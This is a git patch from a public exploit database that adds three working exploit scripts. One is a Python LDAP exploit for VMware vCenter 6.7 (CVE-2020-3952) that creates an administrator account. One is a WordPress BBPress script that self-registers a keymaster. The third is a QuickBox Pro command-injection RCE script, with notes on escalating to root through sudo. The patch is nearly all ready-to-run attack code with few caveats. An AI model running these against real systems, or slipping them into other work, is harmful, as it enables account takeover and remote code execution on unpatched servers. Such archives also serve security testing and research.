From b68cd4f38a9dbf2fb16c4398150a0503521fa697 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 2 Jun 2020 05:01:56 +0000 Subject: [PATCH] DB: 2020-06-02 3 changes to exploits/shellcodes Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation VMware vCenter Server 6.7 - Authentication Bypass QuickBox Pro 2.1.8 - Authenticated Remote Code Execution --- exploits/multiple/webapps/48535.txt | 248 ++++++++++++++++++++++++++++ exploits/php/webapps/48534.py | 58 +++++++ exploits/php/webapps/48536.py | 53 ++++++ files_exploits.csv | 3 + 4 files changed, 362 insertions(+) create mode 100644 exploits/multiple/webapps/48535.txt create mode 100755 exploits/php/webapps/48534.py create mode 100755 exploits/php/webapps/48536.py diff --git a/exploits/multiple/webapps/48535.txt b/exploits/multiple/webapps/48535.txt new file mode 100644 index 000000000..b15ea1f20 --- /dev/null +++ b/exploits/multiple/webapps/48535.txt @@ -0,0 +1,248 @@ +# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass +# Date: 2020-06-01 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html +# Version: vCenter Server 6.7 before update 3f +# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) +# CVE: CVE-2020-3952 + +#!/usr/bin/env python3 + +''' + Copyright 2020 Photubias(c) + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 + + File name CVE-2020-3592.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x + + This is a native implementation without requirements, written in Python 3. + Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: exploit + vulnerability checker +''' + +import binascii, socket, sys, string, random + +## Default vars; change at will +_sIP = '192.168.50.35' +_iPORT = 389 +_iTIMEOUT = 5 + +def randomString(iStringLength=8): + #sLetters = string.ascii_lowercase + sLetters = string.ascii_letters + return ''.join(random.choice(sLetters) for i in range(iStringLength)) + +def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified + ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed + sReturn = sPrefix + if (len(sData) / 2 ) > 255: + sReturn += b'82' + hexBytes = 2 + elif (len(sData) /2 ) >= 128: + sReturn += b'81' + sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() + return sReturn + +def buildBindRequestPacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + ## Packet Construction + sPacket = getLengthPrefix(sPass, b'80') + sPass + sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket + sPacket = b'020103' + sPacket + sPacket = getLengthPrefix(sPacket, b'60') + sPacket + sPacket = b'020101' + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildUserCreatePacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + def createAttribute(sName, sValue): + sValue = getLengthPrefix(sValue, b'04') + sValue + sName = getLengthPrefix(sName, b'04') + sName + + sReturn = getLengthPrefix(sValue, b'31') + sValue + sReturn = sName + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + def createObjectClass(): + sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') + sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') + sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') + sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') + + sReturn = getLengthPrefix(sReturn, b'31') + sReturn + sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + ## Attributes + sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) + sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) + sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) + sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) + sAttributes += createObjectClass() + sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) + ## CN + sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') + sUserEntry = getLengthPrefix(sCN, b'04') + sCN + + ## Packet Assembly (bottom up) + sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes + sPacket = sUserEntry + sPacket + sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildModifyUserPacket(sUser): + sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) + sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') + sMember = binascii.hexlify(b'member') + ## Packet Construction + sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN + sPacket = getLengthPrefix(sPacket, b'31') + sPacket + sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket + sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket + sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def performBind(s): + ## Trying to bind, fails, but necessary (even fails when using correct credentials) + dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') + s.send(dPacket) + sResponse = s.recv(1024) + try: + sResponse = sResponse.split(b'\x04\x00')[0][-1:] + sCode = binascii.hexlify(sResponse).decode() + if sCode == '31': print('[+] Ok, service reachable, continuing') + else: print('[-] Something went wrong') + except: + pass + return sCode + +def performUserAdd(s, sUser, sPass): + dPacket = buildUserCreatePacket(sUser,sPass) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) + elif sCode == b'\x32': + print('[-] Error, this host is not vulnerable (insufficientAccessRights)') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + print('[-] Error, user not added, message received: ' + sMessage) + except: + pass + return sCode + + +def performUserMod(s, sUser, verbose = True): + dPacket = buildModifyUserPacket(sUser) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + if verbose: print('[+] User modification success (if the above is OK).') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + if verbose: print('[-] Error during modification, message received: ' + sMessage) + except: + pass + return sCode, sMessage + +def performUnbind(s): + try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') + except: pass + +def main(): + global _sIP, _iPORT, _iTIMEOUT + _sUSER = 'user_' + randomString(6) + _sPASS = randomString(8) + '_2020' + bAdduser = False + if len(sys.argv) == 1: + print('[!] No arguments found: python3 CVE-2020-3592.py [] []') + print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) + print(' Leave username & password empty for a vulnerability check') + print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') + print(' But for now, I will ask questions') + sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') + if not sAnswer == '': _sIP = sAnswer + sAnswer = input('[?] Want to perform a check only? [Y/n]: ') + if sAnswer.lower() == 'n': bAdduser = True + if bAdduser: + sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') + if not sAnswer == '': _sUSER = sAnswer + sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') + if not sAnswer == '': _sPASS = sAnswer + else: + _sIP = sys.argv[1] + if len(sys.argv) >= 3: + _sUSER = sys.argv[2] + bAdduser = True + if len(sys.argv) >= 4: _sPASS = sys.argv[3] + + ## MAIN + print('') + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(_iTIMEOUT) + try: + s.connect((_sIP,_iPORT)) + except: + print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') + sys.exit(1) + + performBind(s) + + if bAdduser: + sCode = performUserAdd(s, _sUSER, _sPASS) + + if not bAdduser: + print('[!] Checking vulnerability') + sCode, sMessage = performUserMod(s, 'Administrator', False) + if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) + else: print('[+] This host is vulnerable!') + else: + sCode = performUserMod(s, _sUSER) + + performUnbind(s) + + s.close() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/48534.py b/exploits/php/webapps/48534.py new file mode 100755 index 000000000..c7bf7b794 --- /dev/null +++ b/exploits/php/webapps/48534.py @@ -0,0 +1,58 @@ +# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation +# Date: 2020-05-29 +# Exploit Author: Raphael Karger +# Software Link: https://codex.bbpress.org/releases/ +# Version: BBPress < 2.5 +# CVE: CVE-2020-13693 + +import argparse +import requests +import bs4 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +useragent = {"User-Agent" : "This is a real browser i swear"} + +def grab_nonce_login_page(url): + try: + login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) + soup = bs4.BeautifulSoup(login_page_request.text, "lxml") + action = soup.find("form", class_="bbp-login-form") + wp_login_page = action.get("action") + wp_nonce = action.find("input", id="_wpnonce").get("value") + return (wp_nonce, wp_login_page) + except Exception as nonce_error: + print("[-] Nonce Error: '{}'".format(nonce_error)) + return False + +def exploit(url, username, password, email): + info = grab_nonce_login_page(url) + if info: + nonce = info[0] + login_page = info[1] + try: + return requests.post(login_page, data={ + "user_login" : username, + "user_pass" : password, + "user_email" : email, + "user-submit" : "", + "user-cookie" : "1", + "_wpnonce" : nonce, + "bbp-forums-role" : "bbp_keymaster" + }, allow_redirects=False, verify=False, timeout=10, headers=useragent) + except Exception as e: + print("[-] Error Making Signup Post Request: '{}'".format(e)) + return False + +if __name__ == "__main__": + exit("asdasd") + parser = argparse.ArgumentParser() + parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks") + parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123") + parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com") + parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True) + args = parser.parse_args() + site_exploit = exploit(args.url, args.username, args.password, args.email) + if site_exploit and site_exploit.status_code == 302: + exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password)) + print("[-] Exploit Failed") \ No newline at end of file diff --git a/exploits/php/webapps/48536.py b/exploits/php/webapps/48536.py new file mode 100755 index 000000000..9570332e2 --- /dev/null +++ b/exploits/php/webapps/48536.py @@ -0,0 +1,53 @@ +# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution +# Date: 2020-05-26 +# Exploit Author: s1gh +# Vendor Homepage: https://quickbox.io/ +# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/ +# Version: <= 2.1.8 +# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules. +# Tested on: Debian 9 +# CVE: CVE-2020-13448 +# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE + +''' +Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways. +1. sudo mysql -e '\! /bin/sh' +2. sudo mount -o bind /bin/sh /bin/mount;sudo mount + +''' + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import requests +import argparse +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from urllib.parse import quote_plus + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def exploit(args): + s = requests.Session() + print('[*] Sending our payload...') + + s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False) + try: + s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False) + except requests.exceptions.ReadTimeout: + pass + +def main(): + parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8") + parser.add_argument('-i',dest='ip',required=True,help="Target IP Address") + parser.add_argument('-u',dest='username',required=True,help="Username") + parser.add_argument('-p',dest='password',required=True,help="Password") + parser.add_argument('-c',dest='cmd', required=True, help="Command to execute") + args = parser.parse_args() + + exploit(args) + + +if __name__ == '__main__': + main() + sys.exit(0) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f0b4b6136..1d33ec6a1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42761,3 +42761,6 @@ id,file,description,date,author,type,platform,port 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, +48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, +48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple, +48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,